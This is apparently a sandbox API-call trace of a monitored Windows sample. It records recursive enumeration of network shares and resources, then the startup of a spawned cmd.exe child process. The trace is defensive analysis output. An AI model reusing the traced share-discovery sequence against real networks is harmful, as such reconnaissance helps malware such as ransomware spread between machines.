[0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.220] SetLastError (dwErrCode=0x0) [0035.220] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.221] SetLastError (dwErrCode=0x0) [0035.221] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] GetLastError () returned 0x0 [0035.222] SetLastError (dwErrCode=0x0) [0035.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af9940 | out: hHeap=0x2af0000) returned 1 [0035.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af94f8 | out: hHeap=0x2af0000) returned 1 [0035.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af9d80 | out: hHeap=0x2af0000) returned 1 Thread: id = 9 os_tid = 0xb08 [0035.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x21a) returned 0x2af43e0 [0035.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x28) returned 0x2af1268 [0035.223] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x228 [0035.224] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x22c [0035.224] GetComputerNameW (in: lpBuffer=0x2af43f0, nSize=0x2cffb34 | out: lpBuffer="NQDPDE", nSize=0x2cffb34) returned 1 [0035.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04a0 [0035.224] GetLastError () returned 0xcb [0035.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x214) returned 0x2af94f8 [0035.224] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0035.224] GetCurrentThreadId () returned 0xb08 [0035.224] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.225] SetLastError (dwErrCode=0xcb) [0035.225] GetLastError () returned 0xcb [0035.226] SetLastError (dwErrCode=0xcb) [0035.226] GetLastError () returned 0xcb [0035.226] SetLastError (dwErrCode=0xcb) [0035.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4000) returned 0x2af9718 [0035.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2b00048 [0035.226] WNetOpenEnumW (in: dwScope=0x1, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2cffaf4 | out: lphEnum=0x2cffaf4*=0xe97a08) returned 0x0 [0035.937] WNetEnumResourceW (in: hEnum=0xe97a08, lpcCount=0x2cffaec, lpBuffer=0x2af9718, lpBufferSize=0x2cffaf8 | out: lpcCount=0x2cffaec, lpBuffer=0x2af9718, lpBufferSize=0x2cffaf8) returned 0x103 [0035.937] WNetCloseEnum (hEnum=0xe97a08) returned 0x0 [0035.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af9718 | out: hHeap=0x2af0000) returned 1 [0035.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2b00048 | out: hHeap=0x2af0000) returned 1 [0035.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4000) returned 0x2af9718 [0035.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2b00048 [0035.938] WNetOpenEnumW (in: dwScope=0x4, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2cffadc | out: lphEnum=0x2cffadc*=0xe90628) returned 0x0 [0035.938] WNetEnumResourceW (in: hEnum=0xe90628, lpcCount=0x2cffad4, lpBuffer=0x2af9718, lpBufferSize=0x2cffae0 | out: lpcCount=0x2cffad4, lpBuffer=0x2af9718, lpBufferSize=0x2cffae0) returned 0x103 [0035.938] WNetCloseEnum (hEnum=0xe90628) returned 0x0 [0035.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af9718 | out: hHeap=0x2af0000) returned 1 [0035.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2b00048 | out: hHeap=0x2af0000) returned 1 [0035.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4000) returned 0x2af9718 [0035.938] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2b00048 [0035.938] WNetOpenEnumW (in: dwScope=0x5, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2cffac4 | out: lphEnum=0x2cffac4*=0xe97d78) returned 0x0 [0050.840] WNetEnumResourceW (in: hEnum=0xe97d78, lpcCount=0x2cffabc, lpBuffer=0x2af9718, lpBufferSize=0x2cffac8 | out: lpcCount=0x2cffabc, lpBuffer=0x2af9718, lpBufferSize=0x2cffac8) returned 0x0 [0050.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4000) returned 0x2b10050 [0050.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2b14058 [0050.841] WNetOpenEnumW (in: dwScope=0x5, dwType=0x0, dwUsage=0x0, lpNetResource=0x2af9718, lphEnum=0x2cffa84 | out: lphEnum=0x2cffa84*=0xe97ab8) returned 0x0 [0066.798] WNetEnumResourceW (in: hEnum=0xe97ab8, lpcCount=0x2cffa7c, lpBuffer=0x2b10050, lpBufferSize=0x2cffa88 | out: lpcCount=0x2cffa7c, lpBuffer=0x2b10050, lpBufferSize=0x2cffa88) returned 0x0 [0066.798] WNetEnumResourceW (in: hEnum=0xe97ab8, lpcCount=0x2cffa7c, lpBuffer=0x2b10050, lpBufferSize=0x2cffa88 | out: lpcCount=0x2cffa7c, lpBuffer=0x2b10050, lpBufferSize=0x2cffa88) returned 0x103 [0066.798] WNetCloseEnum (hEnum=0xe97ab8) returned 0x0 [0066.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2b10050 | out: hHeap=0x2af0000) returned 1 [0066.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2b14058 | out: hHeap=0x2af0000) returned 1 [0066.799] WNetEnumResourceW (in: hEnum=0xe97d78, lpcCount=0x2cffabc, lpBuffer=0x2af9718, lpBufferSize=0x2cffac8 | out: lpcCount=0x2cffabc, lpBuffer=0x2af9718, lpBufferSize=0x2cffac8) returned 0x103 [0066.799] WNetCloseEnum (hEnum=0xe97d78) returned 0x0 [0066.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af9718 | out: hHeap=0x2af0000) returned 1 [0066.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2b00048 | out: hHeap=0x2af0000) returned 1 [0066.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4000) returned 0x2af9718 [0066.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2b00048 [0066.800] WNetOpenEnumW (in: dwScope=0x3, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2cffaf4 | out: lphEnum=0x2cffaf4*=0xe90528) returned 0x0 [0066.800] WNetEnumResourceW (in: hEnum=0xe90528, lpcCount=0x2cffaec, lpBuffer=0x2af9718, lpBufferSize=0x2cffaf8 | out: lpcCount=0x2cffaec, lpBuffer=0x2af9718, lpBufferSize=0x2cffaf8) returned 0x103 [0066.800] WNetCloseEnum (hEnum=0xe90528) returned 0x0 [0066.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af9718 | out: hHeap=0x2af0000) returned 1 [0066.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2b00048 | out: hHeap=0x2af0000) returned 1 [0066.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4000) returned 0x2af9718 [0066.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2b00048 [0066.801] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2cffadc | out: lphEnum=0x2cffadc*=0xe92870) returned 0x0 [0066.802] WNetEnumResourceW (in: hEnum=0xe92870, lpcCount=0x2cffad4, lpBuffer=0x2af9718, lpBufferSize=0x2cffae0 | out: lpcCount=0x2cffad4, lpBuffer=0x2af9718, lpBufferSize=0x2cffae0) returned 0x0 [0066.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4000) returned 0x2b10050 [0066.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2b14058 [0066.802] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2af9758, lphEnum=0x2cffa9c | out: lphEnum=0x2cffa9c*=0x0) returned 0x4c6 [0066.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2b10050 | out: hHeap=0x2af0000) returned 1 [0066.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2b14058 | out: hHeap=0x2af0000) returned 1 [0066.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4000) returned 0x2b10050 [0066.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2b14058 [0066.803] WNetOpenEnumW (dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2af9738, lphEnum=0x2cffa9c) Thread: id = 42 os_tid = 0xec4 Thread: id = 43 os_tid = 0xf9c Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x4425000" os_pid = "0x4a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xc48" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 12 os_tid = 0xf48 [0043.801] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6d1a90000 [0043.801] __set_app_type (_Type=0x1) [0043.801] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6d1aa6d00) returned 0x0 [0043.801] __getmainargs (in: _Argc=0x7ff6d1ac9200, _Argv=0x7ff6d1ac9208, _Env=0x7ff6d1ac9210, _DoWildCard=0, _StartInfo=0x7ff6d1ac921c | out: _Argc=0x7ff6d1ac9200, _Argv=0x7ff6d1ac9208, _Env=0x7ff6d1ac9210) returned 0 [0043.801] _onexit (_Func=0x7ff6d1aa7fd0) returned 0x7ff6d1aa7fd0 [0043.802] _onexit (_Func=0x7ff6d1aa7fe0) returned 0x7ff6d1aa7fe0 [0043.802] _onexit (_Func=0x7ff6d1aa7ff0) returned 0x7ff6d1aa7ff0 [0043.802] _onexit (_Func=0x7ff6d1aa8000) returned 0x7ff6d1aa8000 [0043.802] _onexit (_Func=0x7ff6d1aa8010) returned 0x7ff6d1aa8010 [0043.802] _onexit (_Func=0x7ff6d1aa8020) returned 0x7ff6d1aa8020 [0043.803] GetCurrentThreadId () returned 0xf48 [0043.803] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf48) returned 0x70 [0043.803] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff92fdd0000 [0043.803] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="SetThreadUILanguage") returned 0x7ff92fdea990 [0043.803] SetThreadUILanguage (LangId=0x0) returned 0x409 [0043.866] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0043.866] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xf1b85af878 | out: phkResult=0xf1b85af878*=0x0) returned 0x2 [0043.867] VirtualQuery (in: lpAddress=0xf1b85af864, lpBuffer=0xf1b85af7e0, dwLength=0x30 | out: lpBuffer=0xf1b85af7e0*(BaseAddress=0xf1b85af000, AllocationBase=0xf1b84b0000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.867] VirtualQuery (in: lpAddress=0xf1b84b0000, lpBuffer=0xf1b85af7e0, dwLength=0x30 | out: lpBuffer=0xf1b85af7e0*(BaseAddress=0xf1b84b0000, AllocationBase=0xf1b84b0000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.867] VirtualQuery (in: lpAddress=0xf1b84b1000, lpBuffer=0xf1b85af7e0, dwLength=0x30 | out: lpBuffer=0xf1b85af7e0*(BaseAddress=0xf1b84b1000, AllocationBase=0xf1b84b0000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.867] VirtualQuery (in: lpAddress=0xf1b84b4000, lpBuffer=0xf1b85af7e0, dwLength=0x30 | out: lpBuffer=0xf1b85af7e0*(BaseAddress=0xf1b84b4000, AllocationBase=0xf1b84b0000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0043.867] VirtualQuery (in: lpAddress=0xf1b85b0000, lpBuffer=0xf1b85af7e0, dwLength=0x30 | out: lpBuffer=0xf1b85af7e0*(BaseAddress=0xf1b85b0000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0xffffb78a, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0043.867] GetConsoleOutputCP () returned 0x1b5 [0044.015] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6d1acfbb0 | out: lpCPInfo=0x7ff6d1acfbb0) returned 1 [0044.037] SetConsoleCtrlHandler (HandlerRoutine=0x7ff6d1ab8150, Add=1) returned 1 [0044.048] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.049] GetConsoleMode (in: hConsoleHandle=0x288, lpMode=0x7ff6d1acfc04 | out: lpMode=0x7ff6d1acfc04) returned 0 [0044.052] _get_osfhandle (_FileHandle=0) returned 0x27c [0044.052] GetConsoleMode (in: hConsoleHandle=0x27c, lpMode=0x7ff6d1acfc00 | out: lpMode=0x7ff6d1acfc00) returned 0 [0044.182] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.182] SetConsoleMode (hConsoleHandle=0x288, dwMode=0x0) returned 0 [0044.182] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.182] GetConsoleMode (in: hConsoleHandle=0x288, lpMode=0x7ff6d1acfc08 | out: lpMode=0x7ff6d1acfc08) returned 0 [0044.182] _get_osfhandle (_FileHandle=0) returned 0x27c [0044.182] GetConsoleMode (in: hConsoleHandle=0x27c, lpMode=0x7ff6d1acfc0c | out: lpMode=0x7ff6d1acfc0c) returned 0 [0044.182] GetEnvironmentStringsW () returned 0x2e8a1bb5a10* [0044.182] GetProcessHeap () returned 0x2e8a1bb0000 [0044.182] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0xa7c) returned 0x2e8a1bb64a0 [0044.182] FreeEnvironmentStringsA (penv="A") returned 1 [0044.182] GetProcessHeap () returned 0x2e8a1bb0000 [0044.182] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x8) returned 0x2e8a1bb6f30 [0044.182] GetEnvironmentStringsW () returned 0x2e8a1bb5a10* [0044.182] GetProcessHeap () returned 0x2e8a1bb0000 [0044.182] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0xa7c) returned 0x2e8a1bb6f50 [0044.183] FreeEnvironmentStringsA (penv="A") returned 1 [0044.183] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf1b85ae728 | out: phkResult=0xf1b85ae728*=0x7c) returned 0x0 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x0, lpData=0xf1b85ae740*=0x4, lpcbData=0xf1b85ae724*=0x1000) returned 0x2 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x4, lpData=0xf1b85ae740*=0x1, lpcbData=0xf1b85ae724*=0x4) returned 0x0 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x0, lpData=0xf1b85ae740*=0x1, lpcbData=0xf1b85ae724*=0x1000) returned 0x2 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x4, lpData=0xf1b85ae740*=0x0, lpcbData=0xf1b85ae724*=0x4) returned 0x0 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x4, lpData=0xf1b85ae740*=0x40, lpcbData=0xf1b85ae724*=0x4) returned 0x0 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x4, lpData=0xf1b85ae740*=0x40, lpcbData=0xf1b85ae724*=0x4) returned 0x0 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x0, lpData=0xf1b85ae740*=0x40, lpcbData=0xf1b85ae724*=0x1000) returned 0x2 [0044.183] RegCloseKey (hKey=0x7c) returned 0x0 [0044.183] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xf1b85ae728 | out: phkResult=0xf1b85ae728*=0x7c) returned 0x0 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x0, lpData=0xf1b85ae740*=0x40, lpcbData=0xf1b85ae724*=0x1000) returned 0x2 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x4, lpData=0xf1b85ae740*=0x1, lpcbData=0xf1b85ae724*=0x4) returned 0x0 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x0, lpData=0xf1b85ae740*=0x1, lpcbData=0xf1b85ae724*=0x1000) returned 0x2 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x4, lpData=0xf1b85ae740*=0x0, lpcbData=0xf1b85ae724*=0x4) returned 0x0 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x4, lpData=0xf1b85ae740*=0x9, lpcbData=0xf1b85ae724*=0x4) returned 0x0 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x4, lpData=0xf1b85ae740*=0x9, lpcbData=0xf1b85ae724*=0x4) returned 0x0 [0044.183] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0xf1b85ae720, lpData=0xf1b85ae740, lpcbData=0xf1b85ae724*=0x1000 | out: lpType=0xf1b85ae720*=0x0, lpData=0xf1b85ae740*=0x9, lpcbData=0xf1b85ae724*=0x1000) returned 0x2 [0044.183] RegCloseKey (hKey=0x7c) returned 0x0 [0044.183] time (in: timer=0x0 | out: timer=0x0) returned 0x5d1e39e7 [0044.183] srand (_Seed=0x5d1e39e7) [0044.183] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0044.183] malloc (_Size=0x4000) returned 0x2e8a1ae54f0 [0044.184] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0044.184] malloc (_Size=0xffce) returned 0x2e8a1d80080 [0044.184] ??_V@YAXPEAX@Z () returned 0x2e8a1d80080 [0044.185] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2e8a1d80080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0044.185] malloc (_Size=0xffce) returned 0x2e8a1d90060 [0044.185] ??_V@YAXPEAX@Z () returned 0x2e8a1d90060 [0044.185] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e8a1d90060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0044.185] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0044.185] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.185] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0044.186] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0044.186] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0044.186] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0044.186] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0044.186] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0044.186] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0044.186] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0044.186] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0044.186] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0044.186] GetProcessHeap () returned 0x2e8a1bb0000 [0044.186] RtlFreeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, BaseAddress=0x2e8a1bb64a0) returned 1 [0044.186] GetEnvironmentStringsW () returned 0x2e8a1bb5a10* [0044.186] GetProcessHeap () returned 0x2e8a1bb0000 [0044.186] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0xa94) returned 0x2e8a1bb7a10 [0044.186] FreeEnvironmentStringsA (penv="A") returned 1 [0044.186] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0044.186] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0044.186] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0044.186] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0044.186] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0044.186] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0044.186] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0044.186] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0044.186] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0044.186] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0044.186] malloc (_Size=0xffce) returned 0x2e8a1da0040 [0044.187] ??_V@YAXPEAX@Z () returned 0x2e8a1da0040 [0044.187] 